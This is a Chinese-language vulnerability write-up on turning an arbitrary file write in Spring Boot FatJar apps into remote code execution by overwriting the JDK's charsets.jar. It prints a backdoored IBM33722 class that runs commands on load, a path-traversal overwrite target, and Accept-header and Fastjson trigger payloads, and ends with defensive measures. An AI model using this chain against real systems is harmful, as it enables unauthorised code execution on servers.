Spring Boot FatJar 写文件到 RCE 漏洞分析与利用<\/h1>

漏洞背景<\/h2>
Spring Boot 项目在生产环境中通常打包成 FatJar（包含所有依赖的 jar 文件），以 java -jar app.jar<\/code> 形式运行。这种打包方式导致：<\/p>


运行时 classpath 包括：<\/p>

app.jar 中的 BOOT-INF\/classes 目录<\/li>
BOOT-INF\/lib 目录下的所有 jar<\/li>
JAVA_HOME 下的系统 classpath jar<\/li>
<\/ul>
<\/li>

无法在运行时向 app.jar 的 classpath 中增加文件<\/p>
<\/li>

现代 Spring Boot 项目多为 RESTful API 服务，很少动态解析 jsp 或其他外部模板文件<\/p>
<\/li>
<\/ol>
传统 RCE 方法的问题<\/h2>
当存在本地任意文件写入漏洞时（如 fastjson、AspectJWeaver 写文件漏洞），传统 RCE 方法包括：<\/p>

写入 Linux crontab 计划任务文件<\/li>
替换 so\/dll 系统文件进行劫持<\/li>
<\/ul>
这些方法在实际环境中常因网络联通性、文件权限等问题难以利用。<\/p>
创新利用思路：JDK 类加载机制<\/h2>
关键发现<\/h3>


JDK 类加载特性<\/strong>：<\/p>

JVM 不会在启动时加载所有 JDK_HOME 下的 jar 文件（性能考虑）<\/li>
JVM 启动后不会主动加载 JDK_HOME 下新增的 jar 文件<\/li>
只能替换 JDK_HOME 下未被 "Opened" 的系统 jar 文件<\/li>
<\/ul>
<\/li>

Windows 特殊行为<\/strong>：<\/p>

Windows JVM 初始化时会预加载某些字符集（如 sun.nio.cs 包中的类）<\/li>
默认会加载 \/jre\/lib\/charsets.jar<\/code> 文件<\/li>
<\/ul>
<\/li>

Linux 环境<\/strong>：<\/p>

默认不加载 charsets.jar<\/li>
当 LANG=zh_CN.GBK<\/code> 时会加载 charsets.jar<\/li>
<\/ul>
<\/li>
<\/ol>
利用路径<\/h3>

通过任意文件写入漏洞覆盖 charsets.jar<\/code><\/li>
触发 JVM 加载被修改的 charsets.jar<\/code><\/li>
在类初始化时执行恶意代码<\/li>
<\/ol>
技术细节分析<\/h2>
触发 charsets.jar 加载的途径<\/h3>
方法1：Spring Web 的 Accept 头处理<\/h4>
通过 org.springframework.web.accept.HeaderContentNegotiationStrategy<\/code> 类的 MediaType.parseMediaTypes<\/code> 方法触发：<\/p>
\/\/ 触发点1：multipart 类型
<\/span><\/span><\/span><\/span>Accept: multipart\/<\/span>form-<\/span>data;<\/span>charset=<\/span>evil;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 触发点2：text\/html 类型
<\/span><\/span><\/span><\/span>Accept: text\/<\/span>html;<\/span>charset=<\/span>IBM33722;<\/span>
<\/span><\/span><\/code><\/pre>调用链：<\/p>
HeaderContentNegotiationStrategy.getMediaTypeKeys()
→ MediaType.parseMediaTypes()
→ MimeTypeUtils.parseMimeType()
→ Charset.forName()
<\/code><\/pre>
方法2：Fastjson 反序列化触发<\/h4>
适用于 Fastjson >= 1.2.68：<\/p>
{
<\/span><\/span>    "x"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "java.nio.charset.Charset"<\/span>,
<\/span><\/span>        "val"<\/span>: "IBM33722"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>调用链：<\/p>
MiscCodec.deserialze()
→ Charset.forName()
<\/code><\/pre>
方法3：AspectJWeaver 写文件 + CC 链触发<\/h4>
利用 Commons Collections 反序列化链触发文件写入：<\/p>
\/\/ 示例代码片段
<\/span><\/span><\/span><\/span>byte<\/span>[]<\/span> code =<\/span> Files.<\/span>readAllBytes<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"charsets.jar"<\/span>));<\/span>
<\/span><\/span>Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.aspectj.weaver.tools.cache.SimpleCache$StoreableCachingMap"<\/span>);<\/span>
<\/span><\/span>Constructor constructor =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>String.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>HashMap storeableCachingMap =<\/span> (<\/span>HashMap)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>".\/"<\/span>,<\/span> 1<\/span>);<\/span>
<\/span><\/span>\/\/ ... 后续构造反序列化链
<\/span><\/span><\/span><\/code><\/pre>漏洞复现步骤<\/h2>
1. 准备恶意 charsets.jar<\/h3>

解压正常的 charsets.jar<\/li>
修改 sun.nio.cs.ext.IBM33722<\/code> 类：<\/li>
<\/ol>
package<\/span> sun.nio.cs.ext;<\/span>
<\/span><\/span>
<\/span><\/span>import<\/span> java.util.UUID;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> IBM33722<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        fun();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> IBM33722<\/span>()<\/span> {<\/span>
<\/span><\/span>        fun();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    private<\/span> static<\/span> java.<\/span>util<\/span>.<\/span>HashMap<\/span><<\/span>String,<\/span> String><\/span> fun<\/span>()<\/span> {<\/span>
<\/span><\/span>        String[]<\/span> command;<\/span>
<\/span><\/span>        String random =<\/span> UUID.<\/span>randomUUID<\/span>().<\/span>toString<\/span>().<\/span>replace<\/span>(<\/span>"-"<\/span>,<\/span> ""<\/span>).<\/span>substring<\/span>(<\/span>1<\/span>,<\/span> 9<\/span>);<\/span>
<\/span><\/span>        String osName =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        if<\/span> (<\/span>osName.<\/span>startsWith<\/span>(<\/span>"Mac OS"<\/span>))<\/span> {<\/span>
<\/span><\/span>            command =<\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> "open -a Calculator"<\/span>};<\/span>
<\/span><\/span>        }<\/span> else<\/span> if<\/span> (<\/span>osName.<\/span>startsWith<\/span>(<\/span>"Windows"<\/span>))<\/span> {<\/span>
<\/span><\/span>            command =<\/span> new<\/span> String[]{<\/span>"cmd.exe"<\/span>,<\/span> "\/c"<\/span>,<\/span> "calc"<\/span>};<\/span>
<\/span><\/span>        }<\/span> else<\/span> {<\/span>
<\/span><\/span>            if<\/span> (<\/span>new<\/span> java.<\/span>io<\/span>.<\/span>File<\/span>(<\/span>"\/bin\/bash"<\/span>).<\/span>exists<\/span>())<\/span> {<\/span>
<\/span><\/span>                command =<\/span> new<\/span> String[]{<\/span>"\/bin\/bash"<\/span>,<\/span> "-c"<\/span>,<\/span> "touch \/tmp\/charsets_test_"<\/span> +<\/span> random +<\/span> ".log"<\/span>};<\/span>
<\/span><\/span>            }<\/span> else<\/span> {<\/span>
<\/span><\/span>                command =<\/span> new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> "touch \/tmp\/charsets_test_"<\/span> +<\/span> random +<\/span> ".log"<\/span>};<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>command);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Throwable e1)<\/span> {<\/span>
<\/span><\/span>            e1.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
重新打包为 charsets.jar（需保留 ExtendedCharsets 类）<\/li>
<\/ol>
2. 上传恶意 charsets.jar<\/h3>
利用任意文件上传漏洞，覆盖目标系统的：<\/p>
..\/..\/usr\/lib\/jvm\/java-1.8-openjdk\/jre\/lib\/charsets.jar
<\/code><\/pre>
3. 触发加载<\/h3>
使用以下任意一种方式触发：<\/p>

HTTP 请求：<\/li>
<\/ol>
GET<\/span> \/any\/endpoint HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Accept:<\/span> multipart\/form-data;charset=IBM33722;<\/span>
<\/span><\/span><\/code><\/pre>
Fastjson 请求：<\/li>
<\/ol>
POST<\/span> \/fastjson HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>    "x"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "java.nio.charset.Charset"<\/span>,
<\/span><\/span>        "val"<\/span>: "IBM33722"<\/span>
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>防御措施<\/h2>


文件权限控制<\/strong>：<\/p>

限制应用对 JDK_HOME 目录的写权限<\/li>
使用专用用户运行 Java 应用<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

严格校验文件上传路径<\/li>
过滤路径中的 ..\/<\/code> 等目录遍历序列<\/li>
<\/ul>
<\/li>

运行时保护<\/strong>：<\/p>

使用 SecurityManager 限制敏感操作<\/li>
监控 JVM 类加载行为<\/li>
<\/ul>
<\/li>

依赖管理<\/strong>：<\/p>

及时更新存在漏洞的组件（如 fastjson）<\/li>
移除不必要的依赖（如 AspectJWeaver）<\/li>
<\/ul>
<\/li>

系统加固<\/strong>：<\/p>

设置只读权限保护关键 jar 文件<\/li>
使用容器技术隔离应用运行环境<\/li>
<\/ul>
<\/li>
<\/ol>
参考资源<\/h2>

LandGrey 的原始研究<\/a><\/li>
PoC 代码和示例<\/a><\/li>
Docker 测试环境<\/a><\/li>
<\/ol>
Spring Boot FatJar 写文件到 RCE 漏洞分析与利用<\/h1>

创新利用思路：JDK 类加载机制<\/h2>

技术细节分析<\/h2>

触发 charsets.jar 加载的途径<\/h3>

漏洞复现步骤<\/h2>

参考资源<\/h2> LandGrey 的原始研究<\/a><\/li> PoC 代码和示例<\/a><\/li> Docker 测试环境<\/a><\/li> <\/ol>

参考资源<\/h2>

LandGrey 的原始研究<\/a><\/li>
PoC 代码和示例<\/a><\/li>
Docker 测试环境<\/a><\/li> <\/ol>
